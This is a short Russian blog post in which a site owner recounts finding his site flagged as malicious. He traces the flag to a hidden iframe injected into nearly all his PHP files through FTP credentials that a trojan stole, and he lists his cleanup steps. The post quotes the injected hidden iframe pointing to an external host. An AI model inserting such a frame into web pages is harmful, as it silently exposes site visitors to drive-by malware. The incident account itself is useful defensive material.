Не так давно зайдя на один из своих сайтов увидел следущее:
Имеется информация, что этот сайт атакует компьютеры!
Имеется информация о том, что сайт ********.ru используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.
Сайты, атакующие компьютеры, пытаются установить программное обеспечение, которое похищает персональную информацию, вредит вашей системе или использует ваш компьютер для атак на другие компьютеры.
Некоторые сайты намеренно созданы для распространения зловредного программного обеспечения, однако многие сайты были взломаны и делают это без ведома или разрешения своих владельцев.
первая мысль была что ппц пришел сайту моему… хакнули…
Посмотрел index.php на наличие лишнего кода. и действительно, после тега идет несовсем приятный код :
<iframe src=»http://a3h.ru:8080/ts/in.cgi?pepsi82″ width=125 height=125 style=»visibility: hidden»>
При дальнейшем рассмотрении выяснилось что практически во всех файлах .php присутствует это..
Оказалось, внедрили этот зловредный фрейм через фтп, пароль и логин из которого благополучно трояном вытянули из Total Commander’a.
Проблема решилась следующим образом:
- сменил пароль на ftp
- с помощью программы notepad++ пакетным редактированием удалил зловредный код.
- почистил свой компьютер от троянов.
После этих событий гугл упорно выдает что мол сайт вреден и ненадо его пользовать… будем решать….
2 responses
Do you want to comment?
Comments RSS and TrackBack Identifier URI ?
Trackbacks